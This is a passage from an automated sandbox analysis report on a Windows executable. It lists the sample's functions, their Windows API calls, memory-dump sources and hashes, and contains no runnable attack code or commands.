                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction ID: 39ab2095516423f533248995afa5b88f9e2e33bd0920f2eea258779ff0fd120f
                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                        • Instruction Fuzzy Hash: AB017C72500209AADF21CF51CC09EDB3BACFB55364F01803AFD1AA21A0D778D964DBA8
                                                        Function 004020FD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 334405425-0
                                                        • Opcode ID: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                        • Instruction ID: ae41dde4eff0046a081fa93f434b6203791b13f397c20c3345ef6f3f33f6a532
                                                        • Opcode Fuzzy Hash: 67a013c8050cadbf48abc2068aad44e6bd126c58b8073b2edd87dd65272e994b
                                                        • Instruction Fuzzy Hash: 4B21A131904104EACF10AFA5CF89A9E7A71BF44369F30413BF105B91E5CBBD99829A2D
                                                        Function 00401BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C30
                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree
                                                        • String ID: Call
                                                        • API String ID: 3394109436-1824292864
                                                        • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                        • Instruction ID: b741a03fd702b7c6772e3f95c256d95ec8b7de3af2fdc922703a565136a7d287
                                                        • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                        • Instruction Fuzzy Hash: 9521F372904150EBDB20ABA4EE85E6E33B8AB04718715063FF542B72D5C7BCE8409B9D
                                                        Function 00402324 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        • lstrlenW.KERNEL32 ref: 00402364
                                                        • lstrlenW.KERNEL32(00000000), ref: 0040236F
                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402398
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                        • String ID:
                                                        • API String ID: 1486964399-0
                                                        • Opcode ID: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                        • Instruction ID: efc15b5f6e7b569f76b1b900a6dd714e3f258eaed93f5a56bcbfb146dffa85c7
                                                        • Opcode Fuzzy Hash: 8ce371ef362fb3a0bf5470d2f9de7d7a8b9c8f0d3a32a51a843dbca6af91aa01
                                                        • Instruction Fuzzy Hash: 94118671914318AADB00EFF58D0AA9EB7F8AF04314F10443FA405F71D5D7B8C9418B69
                                                        Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Enum$CloseValue
                                                        • String ID:
                                                        • API String ID: 397863658-0
                                                        • Opcode ID: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                        • Instruction ID: 66810f11062e6ea255b80fddf1e3d4c9698f673e023b75e7ff91682f7f8ae36f
                                                        • Opcode Fuzzy Hash: b3e66f98151b13811c6deab5670c9eebffc93282c8efb5a28582c7ee2f6ef350
                                                        • Instruction Fuzzy Hash: 43017C71A04615ABEB149F94DE58AAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                        Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                        • Instruction ID: 5bae25e85081f80c41e61f77185b89043c8d74e7c66b6edfbb666f5a0c3c1719
                                                        • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                        • Instruction Fuzzy Hash: 45118C71904216EADF15DFA0CA599AEB7B4FF04348F20443FE402B62D0D3B84A45DB9E
                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                        • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                        • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                        • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                        Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        • Opcode ID: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                        • Instruction ID: 8c17455a9467dbb84b7eb3278e4b377a62f271589af7dc4cff81b1a675067d18
                                                        • Opcode Fuzzy Hash: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                        • Instruction Fuzzy Hash: 6CF06832A045219BDB10BBA5DA8E5AE62A5AB44354F11443FE502B71C1CAF84D02977D
                                                        Function 00405ACB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                        • GetLastError.KERNEL32 ref: 00405B1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                        • Instruction ID: 83f907d2df1d2810bbbe2cf052e9f9ea9028798b61a5f10ffece60f544324ce8
                                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                        • Instruction Fuzzy Hash: 44F0F4B0D1060EDBDB00DFA4D6497EFBBB4AB04309F00812AD941B6281D7B89248CBA9
                                                        Function 00401F03 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        • Opcode ID: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                        • Instruction ID: 14a8ef39102396d835bb54982d99b4aace68b6eedf0c4e81be07541ee7d8ceed
                                                        • Opcode Fuzzy Hash: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                        • Instruction Fuzzy Hash: FEE04F76908610DFE748EBA4AE499EEB3F4EF80365B20197FE001F11D1DBB94D00966D
                                                        Function 00405B5A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                        • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID:
                                                        • API String ID: 3712363035-0
                                                        • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                        • Instruction ID: 1d4bd4e17b1592c090cadeee614c80d4297d43de2f88d62204b9ca700bb873e4
                                                        • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                        • Instruction Fuzzy Hash: C9E09AB4600219BFFB109B64AD06F7B767CE704604F408475BD15E6151D774A8158A78
                                                        Function 00401598 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                        • Instruction ID: 71f073bf0609ebb53fb67f9a0a806094daae3e6e017a449e2b81a31607f58fde
                                                        • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                        • Instruction Fuzzy Hash: AFE04F32B10514ABCB18CFA8FED08AE73A6EB44321310053FD502B36A4C675AD409B18
                                                        Function 0040696B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                          • Part of subcall function 004068FB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • Part of subcall function 004068FB: wsprintfW.USER32 ref: 0040694D
                                                          • Part of subcall function 004068FB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                        • Instruction ID: f16a4ad3e9102b165210d3f50f6adbe363033f5fe81171ed8a06a41b6d2757eb
                                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                        • Instruction Fuzzy Hash: F1E08673504311AAD6105B759D0492772E89F89750302443EF986F2140DB38EC32A6AE
                                                        Function 00406067 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
